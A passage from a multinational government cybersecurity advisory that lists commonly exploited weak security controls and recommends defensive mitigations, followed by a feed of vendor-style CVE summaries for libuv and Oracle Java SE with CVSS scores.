  • Cloud services are unprotected. Misconfigured cloud services are common targets for cyber actors. Poor configurations can allow for sensitive data theft and even cryptojacking.
  • Open ports and misconfigured services are exposed to the internet. This is one of the most common vulnerability findings. Cyber actors use scanning tools to detect open ports and often use them as an initial attack vector. Successful compromise of a service on a host could enable malicious cyber actors to gain initial access and use other tactics and procedures to compromise exposed and vulnerable entities. RDP, Server Message Block (SMB), Telnet, and NetBIOS are high-risk services. 
  • Failure to detect or block phishing attempts. Cyber actors send emails with malicious macros—primarily in Microsoft Word documents or Excel files—to infect computer systems. Initial infection can occur in a variety of ways, such as when a user opens or clicks a malicious download link, PDF, or macro-enabled Microsoft Word document included in phishing emails. 
  • Poor endpoint detection and response. Cyber actors use obfuscated malicious scripts and PowerShell attacks to bypass endpoint security controls and launch attacks on target devices. These techniques can be difficult to detect and protect against. 

Mitigations

Applying the following practices can help organizations strengthen their network defenses against common exploited weak security controls and practices.

Control Access

  • Adopt a zero-trust security model that eliminates implicit trust in any one element, node, or service, and instead requires continuous verification of the operational picture via real-time information from multiple sources to determine access and other system responses.[9],[10] Zero-trust architecture enables granular privilege access management and can allow users to be assigned only the rights required to perform their assigned tasks.
  • Limit the ability of a local administrator account to log in from a remote session (e.g., deny access to this computer from the network) and prevent access via an RDP session. Additionally, use dedicated administrative workstations for privileged user sessions to help limit exposure to all the threats associated with device or user compromise. 
  • Control who has access to your data and services. Give personnel access only to the data, rights, and systems they need to perform their job. This role-based access control, also known as the principle of least priviledge, should apply to both accounts and physical access. If a malicious cyber actor gains access, access control can limit the actions malicious actors can take and can reduce the impact of misconfigurations and user errors. Network defenders should also use this role-based access control to limit the access of service, machine, and functional accounts, as well as the use of management privileges, to what is necessary. Consider the following when implementing access control models:
    • Ensure that access to data and services is specifically tailored to each user, with each employee having their own user account. 
    • Give employees access only to the resources needed to perform their tasks.
    • Change default passwords of equipment and systems upon installation or commissioning. 
    • Ensure there are processes in place for the entry, exit, and internal movement of employees. Delete unused accounts, and immediately remove access to data and systems from accounts of exiting employees who no longer require access. Deactivate service accounts, and activate them only when maintenance is performed.[11]
  • Harden conditional access policies. Review and optimize VPN and access control rules to manage how users connect to the network and cloud services.
  • Verify that all machines, including cloud-based virtual machine instances do not have open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a VPN to access it through the firewall.[12]

Implement Credential Hardening

Establish Centralized Log Management

  • Ensure that each application and system generates sufficient log information. Log files play a key role in detecting attacks and dealing with incidents. By implementing robust log collection and retention, organizations are able to have sufficient information to investigate incidents and detect threat actor behavior. Consider the following when implementing log collection and retention: 
    • Determine which log files are required. These files can pertain to system logging, network logging, application logging, and cloud logging. 
    • Set up alerts where necessary. These should include notifications of suspicious login attempts based on an analysis of log files. 
    • Ensure that your systems store log files in a usable file format, and that the recorded timestamps are accurate and set to the correct time zone. 
    • Forward logs off local systems to a centralized repository or security information and event management (SIEM) tools. Robustly protect SIEM tools with strong account and architectural safeguards.
    • Make a decision regarding the retention period of log files. If you keep log files for a long time, you can refer to them to determine facts long after incidents occur. On the other hand, log files may contain privacy-sensitive information and take up storage space. Limit access to log files and store them in a separate network segment. An incident investigation will be nearly impossible if attackers have been able to modify or delete the logfiles.[13]

Employ Antivirus Programs

  • Deploy an anti-malware solution on workstations to prevent spyware, adware, and malware as part of the operating system security baseline.
  • Monitor antivirus scan results on a routine basis.

Employ Detection Tools and Search for Vulnerabilities

  • Implement endpoint and detection response tools. These tools allow a high degree of visibility into the security status of endpoints and can help effectively protect against malicious cyber actors.
  • Employ an intrusion detection system or intrusion prevention system to protect network and on-premises devices from malicious activity. Use signatures to help detect malicious network activity associated with known threat activity.
  • Conduct penetration testing to identify misconfigurations. See the Additional Resources section below for more information about CISA’s free cyber hygiene services, including remote penetration testing.
  • Conduct vulnerability scanning to detect and address application vulnerabilities. 
  • Use cloud service provider tools to detect overshared cloud storage and monitor for abnormal accesses.

Maintain Rigorous Configuration Management Programs

  • Always operate services exposed on internet-accessible hosts with secure configurations. Never enable external access without compensating controls such as boundary firewalls and segmentation from other more secure and internal hosts like domain controllers. Continuously assess the business and mission need of internet-facing services. Follow best practices for security configurations, especially blocking macros in documents from the internet.[14]

Initiate a Software and Patch Management Program 

  • Implement asset and patch management processes to keep software up to date. Identify and mitigate unsupported, end-of-life, and unpatched software and firmware by performing vulnerability scanning and patching activities. Prioritize patching known exploited vulnerabilities.

Additional Resources 

References 

[1] United States Cybersecurity and Infrastructure Security Agency 
[2] United States Federal Bureau of Investigation
[3] United States National Security Agency
[4] Canadian Centre for Cyber Security 
[5] New Zealand National Cyber Security Centre 
[6] New Zealand CERT NZ
[7] Netherlands National Cyber Security Centre
[8] United Kingdom National Cyber Security Centre 
[9] White House Executive Order on Improving the Nation’s Cybersecurity
[10] NCSC-NL Factsheet: Prepare for Zero Trust
[11] NCSC-NL Guide to Cyber Security Measures
[12] N-able Blog: Intrusion Detection System (IDS): Signature vs. Anomaly-Based
[13] NCSC-NL Guide to Cyber Security Measures
[14] National Institute of Standards and Technology SP 800-123 – Keeping Servers Secured

Contact

U.S. organizations: To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at [email protected]. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at [email protected]. For NSA client requirements or general cybersecurity inquiries, contact [email protected]

Canadian organizations: report incidents by emailing CCCS at [email protected]

New Zealand organizations: report cyber security incidents to [email protected] or call 04 498 7654. 

The Netherlands organizations: report incidents to [email protected]

United Kingdom organizations: report a significant cyber security incident: ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

Caveats

The information you have accessed or received is being provided “as is” for informational purposes only. CISA, the FBI, NSA, CCCS, NCSC-NZ, CERT-NZ, NCSC-NL, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring.

Purpose

This document was developed by CISA, the FBI, NSA, CCCS, NCSC-NZ, CERT-NZ, NCSC-NL, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. 

Revisions

  • May 17, 2022: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

August 15, 2022

CVE-2014-9748 (libuv, node.js)

The uv_rwlock_t fallback implementation for Windows XP and Server 2003 in libuv before 1.7.4 does not properly prevent threads from releasing the locks of other threads, which allows attackers to cause a denial of service (deadlock) or possibly have unspecified other impact by leveraging a race condition.
August 15, 2022

CVE-2017-10086 (active_iq_unified_manager, cloud_backup, debian_linux, e-series_santricity_os_controller, e-series_santricity_storage_manager, element_software, jdk, jre, oncommand_balance, oncommand_insight, oncommand_performance_manager, oncommand_shift, oncommand_unified_manager, plug-in_for_symantec_netbackup, snapmanager, steelstore_cloud_integrated_storage, storage_replication_adapter_for_clustered_data_ontap, vasa_provider_for_clustered_data_ontap, virtual_storage_console)

Vulnerability in the Java SE component of Oracle Java SE (subcomponent: JavaFX). Supported versions that are affected are Java SE: 7u141 and 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
August 15, 2022

CVE-2017-10089 (active_iq_unified_manager, cloud_backup, debian_linux, e-series_santricity_os_controller, e-series_santricity_storage_manager, element_software, enterprise_linux_desktop, enterprise_linux_eus, enterprise_linux_server, enterprise_linux_server_aus, enterprise_linux_server_tus, enterprise_linux_workstation, jdk, jre, oncommand_balance, oncommand_insight, oncommand_performance_manager, oncommand_shift, oncommand_unified_manager, plug-in_for_symantec_netbackup, satellite, snapmanager, steelstore_cloud_integrated_storage, storage_replication_adapter_for_clustered_data_ontap, vasa_provider_for_clustered_data_ontap, virtual_storage_console)

Vulnerability in the Java SE component of Oracle Java SE (subcomponent: ImageIO). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
August 15, 2022

CVE-2017-10105 (active_iq_unified_manager, cloud_backup, e-series_santricity_os_controller, e-series_santricity_storage_manager, element_software, enterprise_linux_desktop, enterprise_linux_eus, enterprise_linux_server, enterprise_linux_workstation, jdk, jre, oncommand_balance, oncommand_insight, oncommand_performance_manager, oncommand_shift, oncommand_unified_manager, plug-in_for_symantec_netbackup, satellite, snapmanager, steelstore_cloud_integrated_storage, storage_replication_adapter_for_clustered_data_ontap, vasa_provider_for_clustered_data_ontap, virtual_storage_console)

Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Deployment). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).
August 15, 2022

CVE-2017-10110 (active_iq_unified_manager, cloud_backup, debian_linux, e-series_santricity_os_controller, e-series_santricity_storage_manager, element_software, enterprise_linux_desktop, enterprise_linux_eus, enterprise_linux_server, enterprise_linux_server_aus, enterprise_linux_server_tus, enterprise_linux_workstation, jdk, jre, oncommand_balance, oncommand_insight, oncommand_performance_manager, oncommand_shift, oncommand_unified_manager, plug-in_for_symantec_netbackup, satellite, snapmanager, steelstore_cloud_integrated_storage, storage_replication_adapter_for_clustered_data_ontap, vasa_provider_for_clustered_data_ontap, virtual_storage_console)

Vulnerability in the Java SE component of Oracle Java SE (subcomponent: AWT). Supported versions that are affected are Java SE: 6u151, 7u141 and 8u131. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H).
August 15, 2022

CVE-2017-10114 (active_iq_unified_manager, cloud_backup, debian_linux, e-series_santricity_os_controller, e-series_santricity_storage_manager, element_software, jdk, jre, oncommand_balance, oncommand_insight, oncommand_performance_manager, oncommand_shift, oncommand_unified_manager, plug-in_for_symantec_netbackup, snapmanager, steelstore_cloud_integrated_storage, storage_replication_adapter_for_clustered_data_ontap, vasa_provider_for_clustered_data_ontap, virtual_storage_console)

Vulnerability in the Java SE component of Oracle Java SE (subcomponent: JavaFX). Supported versions that are affected are Java SE: 7u141 and 8u131. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Java SE, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java SE. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).